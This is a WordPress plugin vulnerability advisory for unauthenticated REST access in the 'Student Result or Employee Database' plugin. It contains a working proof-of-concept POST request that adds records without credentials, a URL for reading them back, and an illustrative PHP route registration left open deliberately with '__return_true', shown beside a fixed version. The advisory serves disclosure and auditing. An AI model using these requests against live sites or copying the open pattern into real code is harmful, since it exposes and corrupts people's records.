wpexploit / wpvulndb WPEX-ID: AF2FEAD6-9F8E-4C00-AC50-440DE969CA42
History: Aug 01, 2022 - 12:00 a.m.

Student Result or Employee Database < 1.8.0 - Unauthorised REST Calls

Published: 2022-08-01 00:00:00
Source: wpvulndb
68
Tags: unauthorised rest calls, database, post request, vulnerability, exploit, security issue

The plugin registers its REST endpoints with a flawed permission callback, so WordPress serves them to anyone. Unauthenticated attackers can therefore call them directly and, for example, add, edit or delete arbitrary student records, as in the request below (no cookie, nonce or other credential is sent):

POST /wp-json/v2/ssr_add_data HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 104
Connection: close

rid=Test&roll=&stdname=&fathersname=&pyear=&cgpa=&subject=&dob=&gender=&address=&mnam=&c1=&c2=&image=


The record created above can then be read back, again without authentication, by passing the RID that was submitted:

http://example.com/wp-json/v2/ssr_find_all?postID=<RID>
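To make the flaw concrete, the following is an added illustrative example and not the plugin's actual source. It shows a WordPress REST route registered with a permission callback that grants access to everyone, next to a hardened registration of the same route. The route names (v2/ssr_add_data, v2/ssr_find_all) are taken from the proof of concept above; the handler function names, the manage_options capability and the argument schema are assumptions chosen for illustration.

```php
<?php
// Illustrative example added to this advisory; not the plugin's own code.
// Route names come from the PoC; handler names, capability and args are assumed.

// --- Vulnerable pattern -------------------------------------------------
// '__return_true' (or any callback that cannot return false) tells the REST
// server that every caller is authorised, including anonymous HTTP clients.
// This is the class of flaw the advisory describes.
function ssr_register_routes_vulnerable() {
    register_rest_route( 'v2', '/ssr_add_data', array(
        'methods'             => 'POST',
        'callback'            => 'ssr_add_data_handler',
        'permission_callback' => '__return_true', // anyone may add records
    ) );
    register_rest_route( 'v2', '/ssr_find_all', array(
        'methods'             => 'GET',
        'callback'            => 'ssr_find_all_handler',
        'permission_callback' => '__return_true', // anyone may read records
    ) );
}

// --- Hardened pattern ---------------------------------------------------
// Require an authenticated user holding a capability appropriate for the
// action. Note: cookie-authenticated REST calls must also carry a valid
// X-WP-Nonce header; without it WordPress treats the request as user 0, so
// is_user_logged_in() is false and the callback denies access.
function ssr_can_manage_records( WP_REST_Request $request ) {
    if ( ! is_user_logged_in() || ! current_user_can( 'manage_options' ) ) {
        return new WP_Error(
            'rest_forbidden',
            'You are not allowed to manage student records.',
            array( 'status' => rest_authorization_required_code() ) // 401 or 403
        );
    }
    return true;
}

function ssr_register_routes_fixed() {
    register_rest_route( 'v2', '/ssr_add_data', array(
        'methods'             => 'POST',
        'callback'            => 'ssr_add_data_handler',
        'permission_callback' => 'ssr_can_manage_records',
        'args'                => array(
            // Validate/sanitise input as well; authorisation alone is not enough.
            'rid' => array(
                'required'          => true,
                'sanitize_callback' => 'sanitize_text_field',
            ),
        ),
    ) );
    register_rest_route( 'v2', '/ssr_find_all', array(
        'methods'             => 'GET',
        'callback'            => 'ssr_find_all_handler',
        'permission_callback' => 'ssr_can_manage_records',
        'args'                => array(
            'postID' => array(
                'required'          => true,
                'sanitize_callback' => 'sanitize_text_field',
            ),
        ),
    ) );
}

// Only one of the two registrations would be hooked in a real plugin;
// the fixed one is shown here.
add_action( 'rest_api_init', 'ssr_register_routes_fixed' );
```

A quick check when auditing a plugin for this class of issue is to grep for `register_rest_route` and inspect every `permission_callback`: `__return_true`, a missing callback, or a callback that only checks a nonce (a nonce is CSRF protection, not authorisation) all leave the route open to the request shown in the proof of concept. After the fix, replaying that unauthenticated POST should return HTTP 401 with a `rest_forbidden` error instead of creating a record.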